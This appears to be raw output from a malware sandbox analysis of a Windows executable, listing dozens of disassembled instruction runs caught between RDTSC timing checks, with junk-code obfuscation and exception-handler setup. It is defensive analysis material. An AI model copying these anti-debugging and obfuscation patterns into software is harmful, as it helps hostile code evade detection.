Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50039 second address: 4B5008C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6268DAF3CCh 0x00000011 adc al, FFFFFFA8h 0x00000014 jmp 00007F6268DAF3CBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e movsx edi, cx 0x00000021 mov bx, si 0x00000024 popad 0x00000025 push FFFFFFFEh 0x00000027 pushad 0x00000028 mov esi, 5CFF15ABh 0x0000002d push eax 0x0000002e push edx 0x0000002f movzx esi, dx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5008C second address: 4B500EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F626941E963h 0x00000008 jmp 00007F626941E963h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push 128BA6F1h 0x00000016 jmp 00007F626941E95Fh 0x0000001b xor dword ptr [esp], 672138B9h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F626941E965h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B500EB second address: 4B500F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B500F1 second address: 4B500F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B500F5 second address: 4B50181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 43066C7Eh 0x0000000d jmp 00007F6268DAF3D4h 0x00000012 xor dword ptr [esp], 36A3470Eh 0x00000019 jmp 00007F6268DAF3D0h 0x0000001e mov eax, dword ptr fs:[00000000h] 0x00000024 pushad 0x00000025 push esi 0x00000026 movsx edx, si 0x00000029 pop ecx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6268DAF3D5h 0x00000031 add esi, 178A2CA6h 0x00000037 jmp 00007F6268DAF3D1h 0x0000003c popfd 0x0000003d popad 0x0000003e popad 0x0000003f push esp 0x00000040 jmp 00007F6268DAF3CAh 0x00000045 mov dword ptr [esp], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b movsx edx, si 0x0000004e push ecx 0x0000004f pop edi 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50181 second address: 4B50187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50187 second address: 4B5018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5018B second address: 4B501C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F626941E965h 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 mov ecx, 2B7B5233h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, 18h 0x00000021 mov dx, ax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B501C0 second address: 4B5023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6268DAF3D7h 0x00000011 or ah, FFFFFFAEh 0x00000014 jmp 00007F6268DAF3D9h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F6268DAF3D0h 0x00000020 add si, CE28h 0x00000025 jmp 00007F6268DAF3CBh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5023E second address: 4B50242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50242 second address: 4B50248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50248 second address: 4B502A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F626941E960h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F626941E967h 0x00000019 add eax, 4F02157Eh 0x0000001f jmp 00007F626941E969h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502A3 second address: 4B502DD instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx esi, dx 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007F6268DAF3CFh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop eax 0x00000017 call 00007F6268DAF3D7h 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502DD second address: 4B50342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E966h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F626941E95Ch 0x00000013 and ax, 4C68h 0x00000018 jmp 00007F626941E95Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F626941E968h 0x00000024 sub ah, FFFFFFC8h 0x00000027 jmp 00007F626941E95Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50342 second address: 4B503B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F6268DAF3CEh 0x0000000f mov eax, dword ptr [75AB4538h] 0x00000014 pushad 0x00000015 movzx eax, dx 0x00000018 mov ax, di 0x0000001b popad 0x0000001c xor dword ptr [ebp-08h], eax 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 popad 0x00000024 xor eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F6268DAF3CBh 0x0000002f xor si, 07CEh 0x00000034 jmp 00007F6268DAF3D9h 0x00000039 popfd 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503B6 second address: 4B503BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 4330h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503BF second address: 4B503DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6268DAF3D1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503DA second address: 4B503E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503E0 second address: 4B503E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503E4 second address: 4B503E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503E8 second address: 4B5049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6268DAF3D5h 0x00000012 xor ah, 00000016h 0x00000015 jmp 00007F6268DAF3D1h 0x0000001a popfd 0x0000001b push eax 0x0000001c pop ecx 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 pushad 0x00000022 call 00007F6268DAF3CFh 0x00000027 pop eax 0x00000028 popad 0x00000029 mov dword ptr fs:[00000000h], eax 0x0000002f jmp 00007F6268DAF3CEh 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 pushad 0x00000038 call 00007F6268DAF3CEh 0x0000003d jmp 00007F6268DAF3D2h 0x00000042 pop esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushfd 0x00000046 jmp 00007F6268DAF3D1h 0x0000004b and eax, 5652CAE6h 0x00000051 jmp 00007F6268DAF3D1h 0x00000056 popfd 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5049C second address: 4B504FA instructions: 0x00000000 rdtsc 0x00000002 call 00007F626941E960h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr fs:[00000018h] 0x00000011 jmp 00007F626941E961h 0x00000016 mov ecx, dword ptr [eax+00000FDCh] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F626941E95Ch 0x00000023 or esi, 795988E8h 0x00000029 jmp 00007F626941E95Bh 0x0000002e popfd 0x0000002f mov ebx, esi 0x00000031 popad 0x00000032 test ecx, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B504FA second address: 4B504FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B504FE second address: 4B50504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50504 second address: 4B5051D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5051D second address: 4B50545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F626941E997h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F626941E968h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40008 second address: 4B4000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4000C second address: 4B40010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40010 second address: 4B40016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40016 second address: 4B40037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, D061h 0x00000007 mov eax, 380E119Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F626941E95Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40037 second address: 4B400CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 05B85D1Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6268DAF3CCh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F6268DAF3D0h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F6268DAF3CEh 0x00000020 sub eax, 6BA337B8h 0x00000026 jmp 00007F6268DAF3CBh 0x0000002b popfd 0x0000002c popad 0x0000002d sub esp, 2Ch 0x00000030 jmp 00007F6268DAF3D5h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F6268DAF3D6h 0x0000003f sbb cx, 5C78h 0x00000044 jmp 00007F6268DAF3CBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B400CA second address: 4B40131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F626941E969h 0x00000013 add ch, FFFFFFC6h 0x00000016 jmp 00007F626941E961h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f jmp 00007F626941E95Ch 0x00000024 mov bh, cl 0x00000026 popad 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F626941E964h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40131 second address: 4B40137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B401BB second address: 4B401F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F626941E969h 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c inc ebx 0x0000000d pushad 0x0000000e mov dx, B590h 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 test al, al 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F626941E95Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B401F8 second address: 4B401FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B401FE second address: 4B4021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F626941EB9Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F626941E95Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4021D second address: 4B4024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6268DAF3D1h 0x00000009 adc ecx, 423B0426h 0x0000000f jmp 00007F6268DAF3D1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4024C second address: 4B40262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea ecx, dword ptr [ebp-14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 mov ebx, 1C478DC8h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40262 second address: 4B40268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40268 second address: 4B4026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B402B9 second address: 4B402BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B402BD second address: 4B402C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B402C3 second address: 4B402E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B402E0 second address: 4B40301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626941E964h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40301 second address: 4B40310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40310 second address: 4B40338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40400 second address: 4B40406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40406 second address: 4B4040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4040A second address: 4B40482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007F6268DAF3CBh 0x00000010 jne 00007F62D9CCD441h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F6268DAF3D4h 0x0000001d adc cx, 0A48h 0x00000022 jmp 00007F6268DAF3CBh 0x00000027 popfd 0x00000028 mov bx, cx 0x0000002b popad 0x0000002c mov ebx, dword ptr [ebp+08h] 0x0000002f jmp 00007F6268DAF3D2h 0x00000034 lea eax, dword ptr [ebp-2Ch] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F6268DAF3D7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40482 second address: 4B40545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, AEFAh 0x00000007 pushfd 0x00000008 jmp 00007F626941E95Bh 0x0000000d jmp 00007F626941E963h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, esi 0x00000017 jmp 00007F626941E966h 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F626941E961h 0x00000024 jmp 00007F626941E95Bh 0x00000029 popfd 0x0000002a pushad 0x0000002b mov cl, 73h 0x0000002d mov ebx, 2F6FFA36h 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 push edx 0x00000037 call 00007F626941E966h 0x0000003c pop eax 0x0000003d pop edx 0x0000003e mov ah, 93h 0x00000040 popad 0x00000041 push esp 0x00000042 jmp 00007F626941E968h 0x00000047 mov dword ptr [esp], eax 0x0000004a pushad 0x0000004b mov si, B9CDh 0x0000004f mov eax, 446C25C9h 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F626941E95Eh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40545 second address: 4B40549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40549 second address: 4B4054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4054F second address: 4B40560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40560 second address: 4B40564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40564 second address: 4B40580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6268DAF3CCh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40580 second address: 4B40584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40584 second address: 4B4058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4058A second address: 4B40590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40590 second address: 4B40594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B405DD second address: 4B405F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E960h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B405F1 second address: 4B30811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F62D9CCD419h 0x00000011 xor eax, eax 0x00000013 jmp 00007F6268D88AFAh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne cl 0x00000026 xor ebx, ebx 0x00000028 test cl, 00000001h 0x0000002b jne 00007F6268DAF3C7h 0x0000002d jmp 00007F6268DAF4EAh 0x00000032 call 00007F626CE3BCF6h 0x00000037 mov edi, edi 0x00000039 pushad 0x0000003a call 00007F6268DAF3CEh 0x0000003f pushad 0x00000040 popad 0x00000041 pop eax 0x00000042 jmp 00007F6268DAF3D1h 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F6268DAF3D3h 0x00000052 sbb cx, 963Eh 0x00000057 jmp 00007F6268DAF3D9h 0x0000005c popfd 0x0000005d call 00007F6268DAF3D0h 0x00000062 pop ecx 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30811 second address: 4B30817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30817 second address: 4B3081B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3081B second address: 4B30829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30829 second address: 4B3083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F6268DAF3D0h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3083F second address: 4B30895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F626941E95Eh 0x00000011 or eax, 4C2BBFF8h 0x00000017 jmp 00007F626941E95Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov esi, 685CD8C5h 0x00000023 mov ch, 3Ch 0x00000025 popad 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F626941E95Fh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30895 second address: 4B308B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B308B2 second address: 4B308B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B308B8 second address: 4B308BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B308BC second address: 4B308C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
